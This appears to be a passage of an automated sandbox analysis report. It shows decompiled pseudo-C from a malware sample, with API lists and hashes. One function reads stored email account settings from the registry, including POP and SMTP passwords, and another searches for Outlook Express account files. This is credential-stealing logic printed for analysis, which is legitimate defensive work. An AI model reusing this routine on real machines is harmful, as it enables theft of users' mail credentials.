                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405EE4(CHAR* _a4) {
                                                                        				void* _t3;
                                                                        
                                                                        				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                                                        				return _t3;
                                                                        			}

                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409B54,00000000,00000000,00000000,00412466,00412466,?,0040B99D,00412466), ref: 00405EF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                        • Instruction ID: 5973f86ffe51395cbbea2b6db375788de2bc2c82441068c359f9d196895a4387
                                                                        • Opcode Fuzzy Hash: 5f03ab8047931506169ca7aa38a5df993ced9b6cd9a6d4ef42b8e6b291ce57f8
                                                                        • Instruction Fuzzy Hash: F7C092B0290201BEFF208A10AD0AF77295DE780700F10C4207A00E40E0D2A14C109A24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040E894(void* __esi) {
                                                                        				struct HINSTANCE__* _t6;
                                                                        				int _t7;
                                                                        
                                                                        				_t6 =  *(__esi + 8);
                                                                        				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
                                                                        				if(_t6 != 0) {
                                                                        					_t7 = FreeLibrary(_t6); // executed
                                                                        					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
                                                                        					return _t7;
                                                                        				}
                                                                        				return _t6;
                                                                        			}

                                                                        APIs
                                                                        • FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                        • Instruction ID: 5028da6d49437ecb3f89885db84a6a431b650c8c1a4919c17fb61c23058b4b99
                                                                        • Opcode Fuzzy Hash: 4be415d56670eca266e1e771d593f986771612930e6043792484bc2d1f3df44a
                                                                        • Instruction Fuzzy Hash: 80C04C31110B018FE7219B12C949753B7E4BF00317F44C868955BD58A4D77CE4A4CE18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040ED91(struct HINSTANCE__* _a4, CHAR* _a8) {
                                                                        
                                                                        				EnumResourceNamesA(_a4, _a8, E0040ED0B, 0); // executed
                                                                        				return 1;
                                                                        			}




                                                                        APIs
                                                                        • EnumResourceNamesA.KERNEL32(?,?,0040ED0B,00000000), ref: 0040EDA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnumNamesResource
                                                                        • String ID:
                                                                        • API String ID: 3334572018-0
                                                                        • Opcode ID: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                        • Instruction ID: b68387c5c0e4344f5c23b4f6c0320e636f75da40900f583e81955e3ef688938f
                                                                        • Opcode Fuzzy Hash: 8d1524d9c285d25282b74650c2e98e28a06c4412789f7c986a027f2826179987
                                                                        • Instruction Fuzzy Hash: 11C09B31594342D7C7119F109D09F1B7A95FF58701F158C3D7251D40E0C7614034D605
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00406F5B(signed int* __esi) {
                                                                        				int _t2;
                                                                        				void* _t3;
                                                                        
                                                                        				_t3 =  *__esi;
                                                                        				if(_t3 != 0xffffffff) {
                                                                        					_t2 = FindClose(_t3); // executed
                                                                        					 *__esi =  *__esi | 0xffffffff;
                                                                        					return _t2;
                                                                        				}
                                                                        				return 0;
                                                                        			}






                                                                        APIs
                                                                        • FindClose.KERNELBASE(?,00406E75,?,?,00000000,rA,00410C7E,*.oeaccount,rA,?,00000104), ref: 00406F65
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseFind
                                                                        • String ID:
                                                                        • API String ID: 1863332320-0
                                                                        • Opcode ID: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                        • Instruction ID: b31b0b49456476ea20311e3f3804ac2d10f8d6de1d59c17087b16cfdac6e9e38
                                                                        • Opcode Fuzzy Hash: 29a0a411e84d7c5badd8bde6db7469c3766740cb6e366e0fff699bb7c3a5e544
                                                                        • Instruction Fuzzy Hash: 67C048351145029AD22C9B38AA5942A77A2AA493303B50B6CB1F3D20E0E77884628A04
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040614B(CHAR* _a4) {
                                                                        				long _t4;
                                                                        
                                                                        				_t4 = GetFileAttributesA(_a4); // executed
                                                                        				return 0 | _t4 != 0xffffffff;
                                                                        			}





                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                        • Instruction ID: f3b66c96cd424dd7ad3beae2567feb80d20b4231abd0f1b127a655f441aacc1c
                                                                        • Opcode Fuzzy Hash: e54bea251bae5a778522ddcd773e5ba5f40eb5ac82a352d16be9d7832b5142d7
                                                                        • Instruction Fuzzy Hash: CAB012752100005BCB0807349D4608E75505F45631720873CB033D00F0D730CC71BB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040EB3F(void* _a4, char* _a8, void** _a12) {
                                                                        				long _t4;
                                                                        
                                                                        				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
                                                                        				return _t4;
                                                                        			}





                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                        • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                                        • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                        • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 87%
                                                                        			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v152;
                                                                        				char _v280;
                                                                        				char _v408;
                                                                        				intOrPtr _v412;
                                                                        				char _v668;
                                                                        				char _v796;
                                                                        				intOrPtr _v800;
                                                                        				char _v928;
                                                                        				char _v940;
                                                                        				char _v952;
                                                                        				char _v956;
                                                                        				char _v1084;
                                                                        				char _v1212;
                                                                        				char _v1340;
                                                                        				intOrPtr _v1344;
                                                                        				char _v1600;
                                                                        				char _v1728;
                                                                        				intOrPtr _v1732;
                                                                        				char _v1860;
                                                                        				char _v1872;
                                                                        				void* _t59;
                                                                        				signed int _t60;
                                                                        				intOrPtr _t63;
                                                                        				void* _t113;
                                                                        				void* _t118;
                                                                        				void* _t122;
                                                                        				char* _t123;
                                                                        				void* _t141;
                                                                        
                                                                        				_t141 = __fp0;
                                                                        				_t118 = __edi;
                                                                        				_t113 = __ecx;
                                                                        				_t59 = E0040EB3F(_a4, _a8,  &_a8);
                                                                        				if(_t59 == 0) {
                                                                        					_t60 = 0x7d;
                                                                        					_a4 = _t60;
                                                                        					_v8 = _t60;
                                                                        					E004021D8( &_v1872);
                                                                        					E004021D8( &_v940);
                                                                        					_t63 = 2;
                                                                        					_v1732 = _t63;
                                                                        					_v800 = _t63;
                                                                        					_push( &_v928);
                                                                        					_push("DisplayName");
                                                                        					_push(_a8);
                                                                        					_v1344 = 4;
                                                                        					_t122 = 0x7f;
                                                                        					_v412 = 1;
                                                                        					E0040EB80(_t122, _t113);
                                                                        					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
                                                                        					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
                                                                        					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
                                                                        					E0040EB59(_t113, _a8, "PopPort",  &_v24);
                                                                        					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
                                                                        					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
                                                                        						_a4 = _a4 & 0x00000000;
                                                                        					}
                                                                        					strcpy( &_v1860,  &_v928);
                                                                        					strcpy( &_v1728,  &_v796);
                                                                        					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
                                                                        					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
                                                                        					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
                                                                        					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
                                                                        					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
                                                                        						_v8 = _v8 & 0x00000000;
                                                                        					}
                                                                        					_t123 = _t118 + 0xa9c;
                                                                        					strcpy( &_v152, _t123);
                                                                        					strcpy( &_v1084, _t123);
                                                                        					_t116 = _a4;
                                                                        					if(_a4 > 0) {
                                                                        						E00401D18( &_v280, _t116);
                                                                        					}
                                                                        					if(_v408 != 0) {
                                                                        						E00402407( &_v940, _t141, _t118);
                                                                        					}
                                                                        					_t117 = _v8;
                                                                        					if(_v8 > 0) {
                                                                        						E00401D18( &_v1212, _t117);
                                                                        					}
                                                                        					if(_v1340 != 0) {
                                                                        						E00402407( &_v1872, _t141, _t118);
                                                                        					}
                                                                        					return RegCloseKey(_a8);
                                                                        				}
                                                                        				return _t59;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                          • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                          • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                          • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                        • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                                        • strcpy.MSVCRT(?,?), ref: 00402F51
                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$QueryValue$CloseOpen
                                                                        • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                        • API String ID: 4127491968-1534328989
                                                                        • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                        • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                                        • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                        • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 99%
                                                                        			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				signed int _v8;
                                                                        				void* _v11;
                                                                        				char _v12;
                                                                        				char _v13;
                                                                        				char _v19;
                                                                        				char _v20;
                                                                        				char _v21;
                                                                        				char _v22;
                                                                        				char _v23;
                                                                        				char _v24;
                                                                        				signed int _v28;
                                                                        				short _v30;
                                                                        				short _v32;
                                                                        				char* _v36;
                                                                        				char* _v40;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				char* _v56;
                                                                        				char* _v60;
                                                                        				char* _v64;
                                                                        				char _v76;
                                                                        				void _v88;
                                                                        				intOrPtr _v92;
                                                                        				char* _v96;
                                                                        				char* _v100;
                                                                        				intOrPtr _v104;
                                                                        				char* _v108;
                                                                        				char* _v112;
                                                                        				char* _v116;
                                                                        				char* _v120;
                                                                        				char* _v124;
                                                                        				intOrPtr _v128;
                                                                        				char* _v132;
                                                                        				char* _v136;
                                                                        				char* _v140;
                                                                        				char* _v144;
                                                                        				char* _v148;
                                                                        				char* _v152;
                                                                        				intOrPtr _v156;
                                                                        				char* _v160;
                                                                        				char* _v164;
                                                                        				char* _v168;
                                                                        				intOrPtr _v172;
                                                                        				char* _v176;
                                                                        				char* _v180;
                                                                        				char* _v184;
                                                                        				char* _v188;
                                                                        				char* _v192;
                                                                        				char* _v196;
                                                                        				intOrPtr _v200;
                                                                        				char* _v204;
                                                                        				char* _v208;
                                                                        				char* _v212;
                                                                        				char* _v216;
                                                                        				char* _v220;
                                                                        				char* _v224;
                                                                        				char* _v228;
                                                                        				intOrPtr _v232;
                                                                        				char* _v236;
                                                                        				char* _v240;
                                                                        				char* _v244;
                                                                        				char* _v248;
                                                                        				char* _v252;
                                                                        				intOrPtr _v256;
                                                                        				char* _v260;
                                                                        				char* _v264;
                                                                        				char* _v268;
                                                                        				char* _v272;
                                                                        				char* _v276;
                                                                        				char* _v280;
                                                                        				intOrPtr _v284;
                                                                        				char* _v288;
                                                                        				char* _v292;
                                                                        				char* _v296;
                                                                        				intOrPtr _v300;
                                                                        				char* _v304;
                                                                        				char* _v308;
                                                                        				char* _v312;
                                                                        				char* _v316;
                                                                        				char* _v320;
                                                                        				char* _v324;
                                                                        				intOrPtr _v328;
                                                                        				char* _v332;
                                                                        				char* _v336;
                                                                        				char* _v340;
                                                                        				char* _v344;
                                                                        				char* _v348;
                                                                        				char* _v352;
                                                                        				char* _v356;
                                                                        				char* _v360;
                                                                        				char* _v364;
                                                                        				intOrPtr _v368;
                                                                        				intOrPtr _v372;
                                                                        				char* _v376;
                                                                        				char* _v380;
                                                                        				intOrPtr _v384;
                                                                        				char* _v388;
                                                                        				char* _v392;
                                                                        				intOrPtr _v396;
                                                                        				intOrPtr _v400;
                                                                        				char* _v404;
                                                                        				char* _v408;
                                                                        				intOrPtr _v412;
                                                                        				char* _v416;
                                                                        				char* _v420;
                                                                        				char* _v424;
                                                                        				char* _v428;
                                                                        				intOrPtr _v432;
                                                                        				intOrPtr _v436;
                                                                        				char* _v440;
                                                                        				intOrPtr _v444;
                                                                        				char* _v448;
                                                                        				char* _v452;
                                                                        				char* _v456;
                                                                        				char* _v460;
                                                                        				intOrPtr _v464;
                                                                        				char* _v468;
                                                                        				intOrPtr* _t200;
                                                                        				char* _t202;
                                                                        				char _t203;
                                                                        				int _t205;
                                                                        				int _t206;
                                                                        				intOrPtr _t209;
                                                                        				char* _t211;
                                                                        				int _t213;
                                                                        				void _t216;
                                                                        				char _t220;
                                                                        				void _t221;
                                                                        				int _t226;
                                                                        				signed int _t231;
                                                                        				intOrPtr* _t232;
                                                                        				void _t237;
                                                                        				void* _t238;
                                                                        				void* _t240;
                                                                        				void* _t245;
                                                                        				signed int _t246;
                                                                        				signed int _t249;
                                                                        				int _t250;
                                                                        				void* _t251;
                                                                        				int _t252;
                                                                        				void* _t254;
                                                                        				void* _t255;
                                                                        				void* _t256;
                                                                        
                                                                        				_v64 = "amp;";
                                                                        				_v60 = "lt;";
                                                                        				_v56 = "gt;";
                                                                        				_v52 = "quot;";
                                                                        				_v48 = "nbsp;";
                                                                        				_v44 = "apos;";
                                                                        				_v24 = 0x26;
                                                                        				_v23 = 0x3c;
                                                                        				_v22 = 0x3e;
                                                                        				_v21 = 0x22;
                                                                        				_v20 = 0x20;
                                                                        				_v19 = 0x27;
                                                                        				_v468 = "iexcl;";
                                                                        				_v464 = "cent;";
                                                                        				_v460 = "pound;";
                                                                        				_v456 = "curren;";
                                                                        				_v452 = "yen;";
                                                                        				_v448 = "brvbar;";
                                                                        				_v444 = "sect;";
                                                                        				_v440 = "uml;";
                                                                        				_v436 = "copy;";
                                                                        				_v432 = "ordf;";
                                                                        				_v428 = "laquo;";
                                                                        				_v424 = "not;";
                                                                        				_v420 = "shy;";
                                                                        				_v416 = "reg;";
                                                                        				_v412 = "macr;";
                                                                        				_v408 = "deg;";
                                                                        				_v404 = "plusmn;";
                                                                        				_v400 = "sup2;";
                                                                        				_v396 = "sup3;";
                                                                        				_v392 = "acute;";
                                                                        				_v388 = "micro;";
                                                                        				_v384 = "para;";
                                                                        				_v380 = "middot;";
                                                                        				_v376 = "cedil;";
                                                                        				_v372 = "sup1;";
                                                                        				_v368 = "ordm;";
                                                                        				_v364 = "raquo;";
                                                                        				_v360 = "frac14;";
                                                                        				_v356 = "frac12;";
                                                                        				_v352 = "frac34;";
                                                                        				_v348 = "iquest;";
                                                                        				_v344 = "Agrave;";
                                                                        				_v340 = "Aacute;";
                                                                        				_v336 = "Acirc;";
                                                                        				_v332 = "Atilde;";
                                                                        				_v328 = "Auml;";
                                                                        				_v324 = "Aring;";
                                                                        				_v320 = "AElig;";
                                                                        				_v316 = "Ccedil;";
                                                                        				_v312 = "Egrave;";
                                                                        				_v308 = "Eacute;";
                                                                        				_v304 = "Ecirc;";
                                                                        				_v300 = "Euml;";
                                                                        				_v296 = "Igrave;";
                                                                        				_v292 = "Iacute;";
                                                                        				_v288 = "Icirc;";
                                                                        				_v284 = "Iuml;";
                                                                        				_v280 = "ETH;";
                                                                        				_v276 = "Ntilde;";
                                                                        				_v272 = "Ograve;";
                                                                        				_v268 = "Oacute;";
                                                                        				_v264 = "Ocirc;";
                                                                        				_v260 = "Otilde;";
                                                                        				_v256 = "Ouml;";
                                                                        				_v252 = "times;";
                                                                        				_v248 = "Oslash;";
                                                                        				_v244 = "Ugrave;";
                                                                        				_v240 = "Uacute;";
                                                                        				_v236 = "Ucirc;";
                                                                        				_v232 = "Uuml;";
                                                                        				_v228 = "Yacute;";
                                                                        				_v224 = "THORN;";
                                                                        				_v220 = "szlig;";
                                                                        				_v216 = "agrave;";
                                                                        				_v212 = "aacute;";
                                                                        				_v208 = "acirc;";
                                                                        				_v204 = "atilde;";
                                                                        				_t200 = _a8;
                                                                        				_v28 = _v28 | 0xffffffff;
                                                                        				_t231 = 0;
                                                                        				_t254 = 0;
                                                                        				_v200 = "auml;";
                                                                        				_v196 = "aring;";
                                                                        				_v192 = "aelig;";
                                                                        				_v188 = "ccedil;";
                                                                        				_v184 = "egrave;";
                                                                        				_v180 = "eacute;";
                                                                        				_v176 = "ecirc;";
                                                                        				_v172 = "euml;";
                                                                        				_v168 = "igrave;";
                                                                        				_v164 = "iacute;";
                                                                        				_v160 = "icirc;";
                                                                        				_v156 = "iuml;";
                                                                        				_v152 = "eth;";
                                                                        				_v148 = "ntilde;";
                                                                        				_v144 = "ograve;";
                                                                        				_v140 = "oacute;";
                                                                        				_v136 = "ocirc;";
                                                                        				_v132 = "otilde;";
                                                                        				_v128 = "ouml;";
                                                                        				_v124 = "divide;";
                                                                        				_v120 = "oslash;";
                                                                        				_v116 = "ugrave;";
                                                                        				_v112 = "uacute;";
                                                                        				_v108 = "ucirc;";
                                                                        				_v104 = "uuml;";
                                                                        				_v100 = "yacute;";
                                                                        				_v96 = "thorn;";
                                                                        				_v92 = "yuml;";
                                                                        				if( *_t200 == 0) {
                                                                        					L45:
                                                                        					_t202 = _a4 + _t231;
                                                                        					 *_t202 = 0;
                                                                        					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
                                                                        						return _t202;
                                                                        					} else {
                                                                        						 *((char*)(_t202 - 1)) = 0;
                                                                        						return _t202;
                                                                        					}
                                                                        				}
                                                                        				while(_a12 == 0xffffffff || _a12 > _t254) {
                                                                        					_t232 = _t254 + _t200;
                                                                        					_t203 =  *_t232;
                                                                        					_v13 = _t203;
                                                                        					if(_t203 != 0x26) {
                                                                        						L33:
                                                                        						if(_a16 == 0 || _t203 > 0x20) {
                                                                        							 *((char*)(_t231 + _a4)) = _t203;
                                                                        							_t231 = _t231 + 1;
                                                                        						} else {
                                                                        							if(_t231 != _v28) {
                                                                        								 *((char*)(_t231 + _a4)) = 0x20;
                                                                        								_t231 = _t231 + 1;
                                                                        								if(_a20 != 0 && _t231 == 1) {
                                                                        									_t231 = 0;
                                                                        								}
                                                                        							}
                                                                        							_v28 = _t231;
                                                                        						}
                                                                        						_t254 = _t254 + 1;
                                                                        						L43:
                                                                        						_t200 = _a8;
                                                                        						if( *((char*)(_t254 + _t200)) != 0) {
                                                                        							continue;
                                                                        						}
                                                                        						break;
                                                                        					}
                                                                        					_t249 = 0;
                                                                        					_v36 = _t232 + 1;
                                                                        					while(1) {
                                                                        						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
                                                                        						_v8 = _t205;
                                                                        						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
                                                                        						_t256 = _t256 + 0x10;
                                                                        						if(_t206 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t249 = _t249 + 1;
                                                                        						if(_t249 < 6) {
                                                                        							continue;
                                                                        						}
                                                                        						_t209 = _a8;
                                                                        						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
                                                                        							L29:
                                                                        							_v8 = _v8 & 0x00000000;
                                                                        							while(1) {
                                                                        								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
                                                                        								_v40 = _t211;
                                                                        								_t250 = strlen(_t211);
                                                                        								_t213 = strncmp(_v36, _v40, _t250);
                                                                        								_t256 = _t256 + 0x10;
                                                                        								if(_t213 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								_v8 = _v8 + 1;
                                                                        								if(_v8 < 0x5f) {
                                                                        									continue;
                                                                        								}
                                                                        								_t203 = _v13;
                                                                        								goto L33;
                                                                        							}
                                                                        							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
                                                                        							_t231 = _t231 + 1;
                                                                        							_t254 = _t254 + _t250 + 1;
                                                                        							goto L43;
                                                                        						}
                                                                        						_t128 = _t209 + 2; // 0x2
                                                                        						_t251 = _t254 + _t128;
                                                                        						_t237 =  *_t251;
                                                                        						if(_t237 == 0x78 || _t237 == 0x58) {
                                                                        							_t159 = _t209 + 3; // 0x3
                                                                        							_t245 = _t254 + _t159;
                                                                        							_t238 = _t245;
                                                                        							_t252 = 0;
                                                                        							while(1) {
                                                                        								_t216 =  *_t238;
                                                                        								if(_t216 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								if(_t216 == 0x3b) {
                                                                        									L27:
                                                                        									if(_t252 <= 0) {
                                                                        										goto L29;
                                                                        									}
                                                                        									memcpy( &_v88, _t245, _t252);
                                                                        									 *((char*)(_t255 + _t252 - 0x54)) = 0;
                                                                        									_t220 = E00406512( &_v88);
                                                                        									_t256 = _t256 + 0x10;
                                                                        									 *((char*)(_t231 + _a4)) = _t220;
                                                                        									_t231 = _t231 + 1;
                                                                        									_t254 = _t254 + _t252 + 4;
                                                                        									goto L43;
                                                                        								}
                                                                        								_t252 = _t252 + 1;
                                                                        								if(_t252 >= 4) {
                                                                        									break;
                                                                        								}
                                                                        								_t238 = _t238 + 1;
                                                                        							}
                                                                        							_t252 = _t252 | 0xffffffff;
                                                                        							goto L27;
                                                                        						} else {
                                                                        							_t240 = _t251;
                                                                        							_t246 = 0;
                                                                        							while(1) {
                                                                        								_t221 =  *_t240;
                                                                        								if(_t221 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								if(_t221 == 0x3b) {
                                                                        									_v8 = _t246;
                                                                        									L18:
                                                                        									if(_v8 <= 0) {
                                                                        										goto L29;
                                                                        									}
                                                                        									memcpy( &_v76, _t251, _v8);
                                                                        									 *((char*)(_t255 + _v8 - 0x48)) = 0;
                                                                        									_t226 = atoi( &_v76);
                                                                        									_t256 = _t256 + 0x10;
                                                                        									_v32 = _t226;
                                                                        									_v12 = 0;
                                                                        									asm("stosb");
                                                                        									_v30 = 0;
                                                                        									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
                                                                        									 *((char*)(_t231 + _a4)) = _v12;
                                                                        									_t231 = _t231 + 1;
                                                                        									_t254 = _t254 + _v8 + 3;
                                                                        									goto L43;
                                                                        								}
                                                                        								_t246 = _t246 + 1;
                                                                        								if(_t246 >= 6) {
                                                                        									break;
                                                                        								}
                                                                        								_t240 = _t240 + 1;
                                                                        							}
                                                                        							_v8 = _v8 | 0xffffffff;
                                                                        							goto L18;
                                                                        						}
                                                                        					}
                                                                        					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
                                                                        					_t231 = _t231 + 1;
                                                                        					_t254 = _t254 + _v8 + 1;
                                                                        					goto L43;
                                                                        				}
                                                                        				goto L45;
                                                                        			}

                                                                        APIs
                                                                        • strlen.MSVCRT ref: 0040FC27
                                                                        • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                        • memcpy.MSVCRT ref: 0040FCB3
                                                                        • atoi.MSVCRT ref: 0040FCC4
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                        • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                        • API String ID: 1895597112-3210201812
                                                                        • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
